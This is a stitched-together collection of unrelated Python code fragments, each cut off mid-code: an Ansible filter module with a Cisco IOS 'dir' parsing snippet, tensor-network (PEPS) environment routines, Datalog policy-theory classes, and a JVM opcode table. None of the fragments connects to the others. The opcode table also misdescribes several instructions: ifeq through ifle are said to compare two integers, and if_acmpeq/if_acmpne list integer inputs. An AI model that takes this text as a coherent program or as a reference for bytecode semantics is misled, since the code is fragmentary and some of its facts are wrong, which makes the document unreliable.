initialize the attributes of a class ''' self.message = None self.error = False super(Verbosity, self).__init__() ''' End of def __init__(self, **args): ''' def v_debug(self, message): ''' Display an error message ''' print(self.__purple + '[DEBUG] ' + self.__reset + message) def v_error(self, message): ''' Display an error message ''' print(self.__red + '[ERROR] ' + self.__reset + message) # ███████╗██╗██╗ ████████╗███████╗██████╗ # ██╔════╝██║██║ ╚══██╔══╝██╔════╝██╔══██╗ # █████╗ ██║██║ ██║ █████╗ ██████╔╝ # ██╔══╝ ██║██║ ██║ ██╔══╝ ██╔══██╗ # ██║ ██║███████╗██║ ███████╗██║ ██║ # ╚═╝ ╚═╝╚══════╝╚═╝ ╚══════╝╚═╝ ╚═╝ # ███╗ ███╗ ██████╗ ██████╗ ██╗ ██╗██╗ ███████╗ # ████╗ ████║██╔═══██╗██╔══██╗██║ ██║██║ ██╔════╝ # ██╔████╔██║██║ ██║██║ ██║██║ ██║██║ █████╗ # ██║╚██╔╝██║██║ ██║██║ ██║██║ ██║██║ ██╔══╝ # ██║ ╚═╝ ██║╚██████╔╝██████╔╝╚██████╔╝███████╗███████╗ # ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝ class FilterModule(object): def __init__(self): self.dp = Verbosity() self.debug = False self.error = False def filters(self): return
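# The __parse_filesystem_space helper above relies on two regex shapes commonly seen
# in the footer of Cisco IOS "dir" output. A minimal, standalone illustration of the
# "bytes total (... bytes free)" case; the sample line is made up for demonstration:
import re

sample = "1621966848 bytes total (1277952000 bytes free)"
if re.match(r'^[0-9]*\s(bytes total).*', sample):
    total_kb = round(int(re.sub(r'\s+(bytes total)\s+.*', '', sample)) / 1000)
    free_kb = round(int(re.sub(r'.*\(([0-9]+?)\s(bytes free).*\)', r'\1', sample)) / 1000)
    print({'total_kb': total_kb, 'free_kb': free_kb})  # {'total_kb': 1621967, 'free_kb': 1277952}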
np.prod([N.ten.shape[i] for i in N.legs[2]]) n4 = np.prod([N.ten.shape[i] for i in N.legs[3]]) Nmat = N.backend.reshape(N.ten,(n1*n2,n3*n4)) u,v = N.backend.eigh(Nmat) u = pos_sqrt_vec(u) Nmat = N.backend.einsum('ij,j,kj->ik',v,u,v) N.ten = Nmat.reshape(N.shape) N = N.transpose([0,2,1,3]) else: N = N.copy().transpose([0,2,1,3]) Nmat = N.ten.make_sparse() (N1,N2,N3,N4,n1,n2,n3,n4) = Nmat.shape Nmat = Nmat.transpose([0,4,1,5,2,6,3,7]) Nmat = Nmat.reshape((N1*n1*N2*n2,N3*n3*N4*n4)) u,v = N.backend.eigh(Nmat) u = pos_sqrt_vec(u) Nmat = N.backend.einsum('ij,j,kj->ik',v,u,v) Nmat = Nmat.reshape((N1,n1,N2,n2,N3,n3,N4,n4)) Nmat = Nmat.transpose([0,2,4,6,1,3,5,7]) # Cast back into a symtensor delta = N.ten.get_irrep_map() Nmat = N.backend.einsum('ABCDabcd,ABCD->ABCabcd',Nmat,delta) N.ten.array = Nmat # Retranspose N = N.transpose([0,2,1,3]) else: if N.sym is None: N = N.transpose([0,2,4,6,8,10,1,3,5,7,9,11]) n0 = np.prod([N.ten.shape[i] for i in N.legs[0]]) n1 = np.prod([N.ten.shape[i] for i in N.legs[1]]) n2 = np.prod([N.ten.shape[i] for i in N.legs[2]]) n3 = np.prod([N.ten.shape[i] for i in N.legs[3]]) n4 = np.prod([N.ten.shape[i] for i in N.legs[4]]) n5 = np.prod([N.ten.shape[i] for i in N.legs[5]]) n6 = np.prod([N.ten.shape[i] for i in N.legs[6]]) n7 = np.prod([N.ten.shape[i] for i in N.legs[7]]) n8 = np.prod([N.ten.shape[i] for i in N.legs[8]]) n9 = np.prod([N.ten.shape[i] for i in N.legs[9]]) n10 = np.prod([N.ten.shape[i] for i in N.legs[10]]) n11 = np.prod([N.ten.shape[i] for i in N.legs[11]]) Nmat = N.backend.reshape(N.ten,(n0*n1*n2*n3*n4*n5,n6*n7*n8*n9*n10*n11)) u,v = N.backend.eigh(Nmat) u = pos_sqrt_vec(u) Nmat = N.backend.einsum('ij,j,kj->ik',v,u,v) N.ten = Nmat.reshape(N.shape) N = N.transpose([0,6,1,7,2,8,3,9,4,10,5,11]) else: N = N.copy().transpose([0,2,4,6,8,10,1,3,5,7,9,11]) Nmat = N.ten.make_sparse() (N0,N1,N2,N3,N4,N5,N6,N7,N8,N9,N10,N11,n0,n1,n2,n3,n4,n5,n6,n7,n8,n9,n10,n11) = Nmat.shape Nmat = Nmat.transpose([0,12,1,13,2,14,3,15,4,16,5,17,6,18,7,19,8,20,9,21,10,22,11,23]) Nmat = Nmat.reshape((N0*n0*N1*n1*N2*n2*N3*n3*N4*n4*N5*n5,N6*n6*N7*n7*N8*n8*N9*n9*N10*n10*N11*n11)) u,v = N.backend.eigh(Nmat) u = pos_sqrt_vec(u) Nmat = N.backend.einsum('ij,j,kj->ik',v,u,v) Nmat = Nmat.reshape((N0,n0,N1,n1,N2,n2,N3,n3,N4,n4,N5,n5,N6,n6,N7,n7,N8,n8,N9,n9,N10,n10,N11,n11)) Nmat = Nmat.transpose([0,2,4,6,8,10,12,14,16,18,20,22,1,3,5,7,9,11,13,15,17,19,21,23]) delta = N.ten.get_irrep_map() Nmat = N.backend.einsum('ABCDEFGHIJKLabcdefghijkl,ABCDEFGHIJKL->ABCDEFGHIJKabcdefghijkl',Nmat,delta) N.ten.array = Nmat N = N.transpose([0,6,1,7,2,8,3,9,4,10,5,11]) except Exception as e: mpiprint(0,'Failed to make N positive:\n\t{}'.format(e)) return N #@profile def calc_local_env(bra1,bra2,ket1,ket2,env_top,env_bot,lbmpo,rbmpo, reduced=True,hermitian=True,positive=True,in_mem=True): """ Calculate the local environment around two peps tensors Args: bra1 : peps tensor The peps tensor for the bottom site bra2 : peps tensor The peps tensor for the top site ket1 : peps tensor The peps tensor for the bottom site ket2 : peps tensor The peps tensor for the top site env_top : env tensor The top environment for the given sites env_bot : env tensor The bottom environment for the given sites lbmpo : list of left boundary mpo tensors The four left boundary mpo tensors surrounding the two peps tensors rbmpo : list of right boundary mpo tensors The four right boundary mpo tensors surrounding the two peps tensors Kwargs: reduced : bool If true, then this function returns the reduced environment. 
Currently, this is the only option available. hermitian : bool Approximate the environment with its nearest hermitian approximate positive : bool Approximate the environment with its nearest possible positive approximate in_mem : bool Whether the tensors input to this function are in memory. If not, tensors should be loaded first (and rewritten to disk afterwards). The output of this funciton, i.e. the local env, will always be in memory. """ # Load tensors (as needed) if not in_mem: bra1.from_disk() bra2.from_disk() ket1.from_disk() ket2.from_disk() if env_top is not None: env_top.from_disk() if env_bot is not None: env_bot.from_disk() for i in range(len(lbmpo)): lbmpo[i].from_disk() for i in range(len(rbmpo)): rbmpo[i].from_disk() if reduced: # Get reduced tensors peps_b,phys_b,phys_t,peps_t = reduce_tensors(bra1,bra2) ket_b,phys_bk,phys_tk,ket_t = reduce_tensors(ket1,ket2) # Compute bottom half of environment if env_bot is None: tmp = einsum('CLB,LDRU->CDBUR',lbmpo[0],peps_b).remove_empty_ind(0).remove_empty_ind(0) tmp = einsum('BUR,cRb->cBUb',tmp,rbmpo[0]).remove_empty_ind(0) tmp = einsum('BUb,BlA->AlUb',tmp,lbmpo[1]) tmp = einsum('AlUb,ldru->dAurUb',tmp,ket_b).remove_empty_ind(0) envb= einsum('AurUb,bra->AuUa',tmp,rbmpo[1]) else: tmp = einsum('CdDc,CLB->BLdDc',env_bot,lbmpo[0]) tmp = einsum('BLdDc,LDRU->BdURc',tmp,peps_b) tmp = einsum('BdURc,cRb->BdUb',tmp,rbmpo[0]) tmp = einsum('BdUb,BlA->AldUb',tmp,lbmpo[1]) tmp = einsum('AldUb,ldru->AurUb',tmp,ket_b) envb= einsum('AurUb,bra->AuUa',tmp,rbmpo[1]) # Compute top half of environment if env_top is None: tmp = einsum('BlC,ldru->CuBdr',lbmpo[3],ket_t).remove_empty_ind(0).remove_empty_ind(0) tmp = einsum('Bdr,brc->cBdb',tmp,rbmpo[3]).remove_empty_ind(0) tmp = einsum('Bdb,ALB->ALdb',tmp,lbmpo[2]) tmp = einsum('ALdb,LDRU->UAdDRb',tmp,peps_t).remove_empty_ind(0) envt= einsum('AdDRb,aRb->AdDa',tmp,rbmpo[2]) else: tmp = einsum('CuUc,BlC->BluUc',env_top,lbmpo[3]) tmp = einsum('BluUc,ldru->BdrUc',tmp,ket_t) tmp = einsum('BdrUc,brc->BdUb',tmp,rbmpo[3]) tmp = einsum('BdUb,ALB->ALdUb',tmp,lbmpo[2]) tmp = einsum('ALdUb,LDRU->AdDRb',tmp,peps_t) envt= einsum('AdDRb,aRb->AdDa',tmp,rbmpo[2]) # Compute Environment N = einsum('AdDa,AuUa->uUdD',envt,envb) N = make_N_positive(N,hermitian=hermitian,positive=positive) # write tensors to disk (as needed) if not in_mem: bra1.to_disk() bra2.to_disk() ket1.to_disk() ket2.to_disk() if env_top is not None: env_top.to_disk() if env_bot is not None: env_bot.to_disk() for i in range(len(lbmpo)): lbmpo[i].to_disk() for i in range(len(rbmpo)): rbmpo[i].to_disk() # Return Results return peps_b, phys_b, phys_t, peps_t, ket_b, phys_bk, phys_tk, ket_t, N else: # Get the PEPS tensors peps_b, peps_t = bra1, bra2 ket_b, ket_t = ket1, ket2 # Compute bottom half of environment if env_bot is None: if lbmpo[0].is_symmetric: # Must determine correct signs for empty tensor (a bit overly complicated) symtmp = einsum('CLB,BlA->CLlA',lbmpo[0],lbmpo[1]) symtmp = einsum('LDPRU,CLlA->DPRUClA',peps_b,symtmp) symtmp = einsum('cRb,DPRUClA->DPUClAcb',rbmpo[0],symtmp) symtmp = einsum('bra,DPUClAcb->DPUClAcra',rbmpo[1],symtmp) symtmp = einsum('ldPru,DPUClAcra->CdDcAuUa',ket_b,symtmp) # Create an empty environment env_bot = ones((1,1,1,1), sym=[symtmp.sym[0][:4], symtmp.sym[1][:4], None, None], backend=lbmpo[0]. 
backend,dtype=lbmpo[0].dtype) else: # Create an empty environment env_bot = ones((1,1,1,1), sym=None, backend=lbmpo[0].backend, dtype=lbmpo[0].dtype) # Contract bottom half of environment tmp = einsum('CdDc,CLB->BLdDc',env_bot,lbmpo[0]) tmp = einsum('BLdDc,cRb->BLdDRb',tmp,rbmpo[0]) tmp = einsum('BLdDRb,BlA->AlLdDRb',tmp,lbmpo[1]) envb = einsum('AlLdDRb,bra->AlLdDrRa',tmp,rbmpo[1]) # Compute top half of environment if env_top is None: if lbmpo[3].is_symmetric: # Must determine correct signs for empty tensor (a bit overly complicated) symtmp = einsum('ALB,BlC->ALlC',lbmpo[2],lbmpo[3]) symtmp = einsum('LDPRU,ALlC->DPRUAlC',peps_t,symtmp) symtmp = einsum('aRb,DPRUAlC->DPUAlCab',rbmpo[2],symtmp) symtmp = einsum('brc,DPUAlCab->DPUAlCarc',rbmpo[3],symtmp) symtmp = einsum('ldPru,DPUAlCarc->CuUcDaAd',ket_t,symtmp) # Create an empty environment env_top = ones((1,1,1,1), sym=[symtmp.sym[0][:4], symtmp.sym[1][:4], None, None], backend=lbmpo[0].backend, dtype=lbmpo[0].dtype) else: # Create an empty environment env_top = ones((1,1,1,1), sym=None, backend=lbmpo[0].backend,dtype=lbmpo[0].dtype) tmp = einsum('CuUc,BlC->BluUc',env_top,lbmpo[3]) tmp = einsum('BluUc,brc->BluUrb',tmp,rbmpo[3]) tmp = einsum('BluUrb,ALB->ALluUrb',tmp,lbmpo[2]) envt = einsum('ALluUrb,aRb->AlLuUrRa',tmp,rbmpo[2]) # Compute Environment N = einsum('AkKuUsSa,AlLdDrRa->lLdDrRkKuUsS',envt,envb) N = make_N_positive(N, hermitian=hermitian, positive=positive, reduced=reduced) # write tensors to disk (as needed) if not in_mem: bra1.to_disk() bra2.to_disk() ket1.to_disk() ket2.to_disk() if env_top is not None: env_top.to_disk() if env_bot is not None: env_bot.to_disk() for i in range(len(lbmpo)): lbmpo[i].to_disk() for i in range(len(rbmpo)): rbmpo[i].to_disk() # Return Results return N def calc_local_op(phys_b_bra,phys_t_bra,N,ham, phys_b_ket=None,phys_t_ket=None, reduced=True,normalize=True,return_norm=False): """ Calculate the normalized Energy of the system """ # Make some copies if phys_t_ket is None: phys_t_ket = phys_t_bra.copy().conj() if phys_b_ket is None: phys_b_ket = phys_b_bra.copy().conj() # Compute Energy (or op value if reduced: tmp = einsum('APU,UQB->APQB',phys_b_bra,phys_t_bra) tmp1= einsum('APQB,aAbB->aPQb',tmp,N) tmp2= einsum('apu,uqb->apqb',phys_b_ket,phys_t_ket) norm = einsum('apqb,apqb->',tmp1,tmp2) if ham is not None: tmp = einsum('aPQb,apqb->PQpq',tmp1,tmp2) if len(tmp.legs[0]) == 2: # Thermal state tmp.unmerge_ind(3) tmp.unmerge_ind(2) tmp.unmerge_ind(1) tmp.unmerge_ind(0) E = einsum('PaQbpaqb,PQpq->',tmp,ham) tmp.merge_inds([0,1]) tmp.merge_inds([1,2]) tmp.merge_inds([2,3]) tmp.merge_inds([3,4]) else: # Normal peps E = einsum('PQpq,PQpq->',tmp,ham) else: E = norm else: # (Bra is capital, ket is lower case) comb1 = einsum('LDPRZ,KZQSU->LDPRKQSU', phys_b_bra, phys_t_bra) comb1 = einsum('LDPRKQSU,lLdDrRkKuUsS->PQldrkus', comb1, N) comb2 = einsum('ldprz,kzqsu->ldprkqsu', phys_b_ket, phys_t_ket) norm = einsum('PQldrkus,ldPrkQsu->', comb1, comb2) if ham is not None: phys_inds = einsum('PQldrkus,ldprkqsu->PQpq', comb1, comb2) if len(phys_inds.legs[0]) == 2: # Thermal state phys_inds.unmerge_ind(3) phys_inds.unmerge_ind(2) phys_inds.unmerge_ind(1) phys_inds.unmerge_ind(0) E = einsum('PaQbpaqb,PQpq->', phys_inds, ham) phys_inds.merge_inds([0,1]) phys_inds.merge_inds([1,2]) phys_inds.merge_inds([2,3]) phys_inds.merge_inds([3,4]) else: # Normal peps E = einsum('PQpq,PQpq->', phys_inds, ham) else: E = norm # Return Result if normalize: if return_norm: return E/norm,norm else: return E/norm else: if return_norm: return E,norm 
else: return E def calc_N(row,bra_col,left_bmpo,right_bmpo,top_envs,bot_envs,hermitian=True,positive=True,ket_col=None,in_mem=True,reduced=True): """ Calculate the environment tensor """ # Copy bra if needed _ket_col = ket_col if ket_col is None: ket_col = [None]*len(bra_col) for i in range(len(ket_col)): ket_col[i] = bra_col[i].copy() # Compute Local Environment (N) if row == 0: if len(bra_col) == 2: # Only two sites in column, use identity at both ends res = calc_local_env(bra_col[row], bra_col[row+1], ket_col[row], ket_col[row+1], None, None, left_bmpo[row*2,row*2+1,row*2+2,row*2+3], right_bmpo[row*2,row*2+1,row*2+2,row*2+3], hermitian=hermitian, positive=positive, in_mem=in_mem, reduced=reduced) else: # Identity only on bottom res = calc_local_env(bra_col[row], bra_col[row+1], ket_col[row], ket_col[row+1], top_envs[row+2], None, left_bmpo[row*2,row*2+1,row*2+2,row*2+3], right_bmpo[row*2,row*2+1,row*2+2,row*2+3], hermitian=hermitian, positive=positive, in_mem=in_mem, reduced=reduced) elif row == len(bra_col)-2: # Identity needed on top res = calc_local_env(bra_col[row], bra_col[row+1], ket_col[row], ket_col[row+1], None, bot_envs[row-1], left_bmpo[row*2,row*2+1,row*2+2,row*2+3], right_bmpo[row*2,row*2+1,row*2+2,row*2+3], hermitian=hermitian, positive=positive, in_mem=in_mem, reduced=reduced) else: # Get the local environment tensor (no identity needed) res = calc_local_env(bra_col[row], bra_col[row+1], ket_col[row], ket_col[row+1], top_envs[row+2], bot_envs[row-1], left_bmpo[row*2,row*2+1,row*2+2,row*2+3], right_bmpo[row*2,row*2+1,row*2+2,row*2+3], hermitian=hermitian, positive=positive, in_mem=in_mem, reduced=reduced) return res def calc_local_nn_op_lb(mpo,bra,ket,top,bot,left,right,normalize=True,contracted_env=False,chi=10): """ Calculate the value of an operator as an mpo acting on the left and bottom bonds of a 2x2 peps grid """ # Check if it is a thermal state: thermal = len(bra[0][1].legs[2]) == 2 # Absorb MPO into bra Hbra = [[None,None],[None,None]] if thermal: bra[0][1].unmerge_ind(2) Hbra[0][1] = einsum('ldparu,pPx->ldxParu',bra[0][1],mpo[0]) # Top left site Hbra[0][1].merge_inds([1,2]) Hbra[0][1].merge_inds([2,3]) bra[0][1].merge_inds([2,3]) bra[0][0].unmerge_ind(2) Hbra[0][0] = einsum('ldparu,xpPy->ldParyux',bra[0][0],mpo[1]) # Bottom left site Hbra[0][0].merge_inds([2,3]) Hbra[0][0].merge_inds([3,4]) Hbra[0][0].merge_inds([4,5]) bra[0][0].merge_inds([2,3]) bra[1][0].unmerge_ind(2) Hbra[1][0] = einsum('ldparu,ypP->lydParu',bra[1][0],mpo[2]) # Bottom right site Hbra[1][0].merge_inds([0,1]) Hbra[1][0].merge_inds([2,3]) Hbra[1][1] = bra[1][1].copy() bra[1][0].merge_inds([2,3]) else: Hbra[0][1] = einsum('ldpru,pPx->ldxPru',bra[0][1],mpo[0]) # Top left site Hbra[0][1].merge_inds([1,2]) Hbra[0][0] = einsum('ldpru,xpPy->ldPryux',bra[0][0],mpo[1]) # Bottom left site Hbra[0][0].merge_inds([3,4]) Hbra[0][0].merge_inds([4,5]) Hbra[1][0] =
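# make_N_positive above symmetrizes the environment through an eigendecomposition and
# rebuilds it as V * f(lam) * V^T, where pos_sqrt_vec (not shown in this excerpt)
# presumably maps the eigenvalue vector to something non-negative. A numpy-only sketch
# of that kind of projection, under the assumption that negative eigenvalues are
# simply clipped to zero (illustrative, not the original pos_sqrt_vec):
import numpy as np

def nearest_positive_approx(Nmat):
    """Project an (approximately) hermitian matrix onto the positive-semidefinite cone."""
    lam, V = np.linalg.eigh(Nmat)
    lam = np.clip(lam, 0.0, None)          # drop negative eigenvalues
    return np.einsum('ij,j,kj->ik', V, lam, V.conj())

# Example on a small indefinite matrix:
# M = np.array([[1.0, 2.0], [2.0, 1.0]])                      # eigenvalues 3 and -1
# print(np.linalg.eigvalsh(nearest_positive_approx(M)))        # ~[0., 3.]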
rules with that table in head self.contents = {} if rules is not None: for rule in rules: self.insert(rule) ############### External Interface ############### # SELECT implemented by TopDownTheory def insert(self, rule): changes = self.update([Event(formula=rule, insert=True)]) return [event.formula for event in changes] def delete(self, rule): changes = self.update([Event(formula=rule, insert=False)]) return [event.formula for event in changes] def update(self, events): """Apply EVENTS and return the list of EVENTS that actually changed the theory. Each event is the insert or delete of a policy statement. """ changes = [] self.log(None, "Update " + iterstr(events)) for event in events: if event.insert: if self.insert_actual(event.formula): changes.append(event) else: if self.delete_actual(event.formula): changes.append(event) return changes def update_would_cause_errors(self, events): """Return a list of compile.CongressException if we were to apply the insert/deletes of policy statements dictated by EVENTS to the current policy. """ self.log(None, "update_would_cause_errors " + iterstr(events)) errors = [] current = set(self.policy()) for event in events: if not compile.is_datalog(event.formula): errors.append(compile.CongressException( "Non-formula found: {}".format( str(event.formula)))) else: if event.formula.is_atom(): errors.extend(compile.fact_errors(event.formula)) else: errors.extend(compile.rule_errors(event.formula)) if event.insert: current.add(event.formula) else: current.remove(event.formula) if compile.is_recursive(current): errors.append(compile.CongressException( "Rules are recursive")) return errors def define(self, rules): """Empties and then inserts RULES. """ self.empty() return self.update([Event(formula=rule, insert=True) for rule in rules]) def empty(self): """Deletes contents of theory. """ self.contents = {} def policy(self): return self.content() def get_arity_self(self, tablename): if tablename not in self.contents: return None if len(self.contents[tablename]) == 0: return None return len(self.contents[tablename][0].head.arguments) ############### Internal Interface ############### def insert_actual(self, rule): """Insert RULE and return True if there was a change. """ if compile.is_atom(rule): rule = compile.Rule(rule, [], rule.location) self.log(rule.head.table, "Insert: {}".format(str(rule))) table = rule.head.table if table in self.contents: if rule not in self.contents[table]: # eliminate dups self.contents[table].append(rule) return True return False else: self.contents[table] = [rule] return True def delete_actual(self, rule): """Delete RULE and return True if there was a change. """ if compile.is_atom(rule): rule = compile.Rule(rule, [], rule.location) self.log(rule.head.table, "Delete: {}".format(str(rule))) table = rule.head.table if table in self.contents: try: self.contents[table].remove(rule) return True except ValueError: return False return False def content(self, tablenames=None): if tablenames is None: tablenames = self.contents.keys() results = [] for table in tablenames: results.extend(self.contents[table]) return results class ActionTheory(NonrecursiveRuleTheory): """Same as NonrecursiveRuleTheory except it has fewer constraints on the permitted rules. Still working out the details. """ def update_would_cause_errors(self, events): """Return a list of compile.CongressException if we were to apply the events EVENTS to the current policy. 
""" self.log(None, "update_would_cause_errors " + iterstr(events)) errors = [] current = set(self.policy()) for event in events: if not compile.is_datalog(event.formula): errors.append(compile.CongressException( "Non-formula found: {}".format( str(event.formula)))) else: if event.formula.is_atom(): errors.extend(compile.fact_errors(event.formula)) else: pass # Should put this back in place, but there are some # exceptions that we don't handle right now. # Would like to mark some tables as only being defined # for certain bound/free arguments and take that into # account when doing error checking. #errors.extend(compile.rule_negation_safety(event.formula)) if event.insert: current.add(event.formula) else: current.remove(event.formula) if compile.is_recursive(current): errors.append(compile.CongressException( "Rules are recursive")) return errors class DeltaRuleTheory (Theory): """A collection of DeltaRules. Not useful by itself as a policy.""" def __init__(self, name=None, abbr=None): super(DeltaRuleTheory, self).__init__(name=name, abbr=abbr) # dictionary from table name to list of rules with that table as # trigger self.contents = {} # dictionary from delta_rule to the rule from which it was derived self.originals = set() # dictionary from table name to number of rules with that table in # head self.views = {} # all tables self.all_tables = {} def modify(self, event): """Insert/delete the compile.Rule RULE into the theory. Return list of changes (either the empty list or a list including just RULE). """ self.log(None, "DeltaRuleTheory.modify " + str(event.formula)) self.log(None, "originals: " + iterstr(self.originals)) if event.insert: if self.insert(event.formula): return [event] else: if self.delete(event.formula): return [event] return [] def insert(self, rule): """Insert a compile.Rule into the theory. Return True iff the theory changed. """ assert compile.is_regular_rule(rule), \ "DeltaRuleTheory only takes rules" self.log(rule.tablename(), "Insert: {}".format(str(rule))) if rule in self.originals: self.log(None, iterstr(self.originals)) return False self.log(rule.tablename(), "Insert 2: {}".format(str(rule))) for delta in self.compute_delta_rules([rule]): self.reorder(delta) self.insert_delta(delta) self.originals.add(rule) return True def insert_delta(self, delta): """Insert a delta rule.""" self.log(None, "Inserting delta rule {}".format(str(delta))) # views (tables occurring in head) if delta.head.table in self.views: self.views[delta.head.table] += 1 else: self.views[delta.head.table] = 1 # tables for table in delta.tablenames(): if table in self.all_tables: self.all_tables[table] += 1 else: self.all_tables[table] = 1 # contents # TODO(thinrichs): eliminate dups, maybe including # case where bodies are reorderings of each other if delta.trigger.table not in self.contents: self.contents[delta.trigger.table] = [delta] else: self.contents[delta.trigger.table].append(delta) def delete(self, rule): """Delete a compile.Rule from theory. Assumes that COMPUTE_DELTA_RULES is deterministic. Returns True iff the theory changed. 
""" self.log(rule.tablename(), "Delete: {}".format(str(rule))) if rule not in self.originals: return False for delta in self.compute_delta_rules([rule]): self.delete_delta(delta) self.originals.remove(rule) return True def delete_delta(self, delta): """Delete the DeltaRule DELTA from the theory.""" # views if delta.head.table in self.views: self.views[delta.head.table] -= 1 if self.views[delta.head.table] == 0: del self.views[delta.head.table] # tables for table in delta.tablenames(): if table in self.all_tables: self.all_tables[table] -= 1 if self.all_tables[table] == 0: del self.all_tables[table] # contents if delta.trigger.table not in self.contents: return self.contents[delta.trigger.table].remove(delta) def policy(self): return self.originals def get_arity_self(self, tablename): for p in self.originals: if p.head.table == tablename: return len(p.head.arguments) return None def __str__(self): return str(self.contents) def rules_with_trigger(self, table): """Return the list of DeltaRules that trigger on the given TABLE.""" if table not in self.contents: return [] else: return self.contents[table] def is_view(self, x): return x in self.views def is_known(self, x): return x in self.all_tables def base_tables(self): base = [] for table in self.all_tables: if table not in self.views: base.append(table) return base @classmethod def eliminate_self_joins(cls, formulas): """Return new list of formulas that is equivalent to the list of formulas FORMULAS except that there are no self-joins. """ def new_table_name(name, arity, index): return "___{}_{}_{}".format(name, arity, index) def n_variables(n): vars = [] for i in xrange(0, n): vars.append("x" + str(i)) return vars # dict from (table name, arity) tuple to # max num of occurrences of self-joins in any rule global_self_joins = {} # remove self-joins from rules results = [] for rule in formulas: if rule.is_atom(): results.append(rule) continue logging.debug("eliminating self joins from {}".format(rule)) occurrences = {} # for just this rule for atom in rule.body: table = atom.table arity = len(atom.arguments) tablearity = (table, arity) if tablearity not in occurrences: occurrences[tablearity] = 1 else: # change name of atom atom.table = new_table_name(table, arity, occurrences[tablearity]) # update our counters occurrences[tablearity] += 1 if tablearity not in global_self_joins: global_self_joins[tablearity] = 1 else: global_self_joins[tablearity] = \ max(occurrences[tablearity] - 1, global_self_joins[tablearity]) results.append(rule) logging.debug("final rule: {}".format(str(rule))) # add definitions for new tables for tablearity in global_self_joins: table = tablearity[0] arity = tablearity[1] for i in xrange(1, global_self_joins[tablearity] + 1): newtable = new_table_name(table, arity, i) args = [compile.Variable(var) for var in n_variables(arity)] head = compile.Literal(newtable, args) body = [compile.Literal(table, args)] results.append(compile.Rule(head, body)) logging.debug("Adding rule {}".format(results[-1])) return results @classmethod def compute_delta_rules(cls, formulas): """Assuming FORMULAS has no self-joins, return a list of DeltaRules derived from those FORMULAS. """ # Should do the following for correctness, but it needs to be # done elsewhere so that we can properly maintain the tables # that are generated. 
# formulas = cls.eliminate_self_joins(formulas) delta_rules = [] for rule in formulas: if rule.is_atom(): continue for literal in rule.body: newbody = [lit for lit in rule.body if lit is not literal] delta_rules.append( DeltaRule(literal, rule.head, newbody, rule)) return delta_rules @classmethod def reorder(cls, delta): """Given a delta rule DELTA, re-order its body for efficient and correct computation. """ # ensure negatives come after positives positives = [lit for lit in delta.body if not lit.is_negated()] negatives = [lit for lit in delta.body if lit.is_negated()] positives.extend(negatives) delta.body = positives class MaterializedViewTheory(TopDownTheory): """A theory that stores the table contents of views explicitly. Relies on included theories to define the contents of those tables not defined by the rules of the theory. Recursive rules are allowed. """ def __init__(self, name=None, abbr=None): super(MaterializedViewTheory, self).__init__(name=name, abbr=abbr) # queue of events left to process self.queue = EventQueue() # data storage db_name = None db_abbr = None delta_name =
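# compute_delta_rules above turns every rule into one delta rule per body literal: the
# literal becomes the trigger and the remaining literals stay as the body, so an
# insert or delete of a tuple only re-evaluates the rules it can actually affect.
# A schematic, dependency-free illustration (plain tuples instead of compile.Rule and
# DeltaRule, so the names here are illustrative only):
def schematic_delta_rules(head, body):
    """For a rule 'head :- body', yield one (trigger, head, rest_of_body) per body literal."""
    return [(lit, head, [b for b in body if b is not lit]) for lit in body]

# Example: p(x) :- q(x), r(x) gives two delta rules, one triggered on q and one on r:
# print(schematic_delta_rules('p(x)', ['q(x)', 'r(x)']))
# [('q(x)', 'p(x)', ['r(x)']), ('r(x)', 'p(x)', ['q(x)'])]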
"name": "lcmp", "description": "Compare two longs", "inputs": [OperandType.Long, OperandType.Long], "outputs": [OperandType.Integer], }, 0x95: { "name": "fcmpl", "description": "Compare two floats", "inputs": [OperandType.Float, OperandType.Float], "outputs": [OperandType.Integer], }, 0x96: { "name": "fcmpg", "description": "Compare two floats", "inputs": [OperandType.Float, OperandType.Float], "outputs": [OperandType.Integer], }, 0x97: { "name": "dcmpl", "description": "Compare two doubles", "inputs": [OperandType.Double, OperandType.Double], "outputs": [OperandType.Integer], }, 0x98: { "name": "dcmpg", "description": "Compare two doubles", "inputs": [OperandType.Double, OperandType.Double], "outputs": [OperandType.Integer], }, 0x99: { "name": "ifeq", "description": "If the first value is equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0x9a: { "name": "ifne", "description": "If the first value is not equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0x9b: { "name": "iflt", "description": "If the first value is less than the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0x9c: { "name": "ifge", "description": "If the first value is greater than or equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0x9d: { "name": "ifgt", "description": "If the first value is greater than the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0x9e: { "name": "ifle", "description": "If the first value is less than or equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0x9f: { "name": "if_icmpeq", "description": "If the first value is equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa0: { "name": "if_icmpne", "description": "If the first value is not equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa1: { "name": "if_icmplt", "description": "If the first value is less than the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa2: { "name": "if_icmpge", "description": "If the first value is greater than or equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa3: { "name": "if_icmpgt", "description": "If the first value is greater than the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa4: { "name": "if_icmple", "description": "If the first value is less than or equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa5: { "name": "if_acmpeq", "description": "If the first value is equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa6: { "name": "if_acmpne", "description": "If the first value is not equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa7: { "name": "goto", "description": "Branch to 
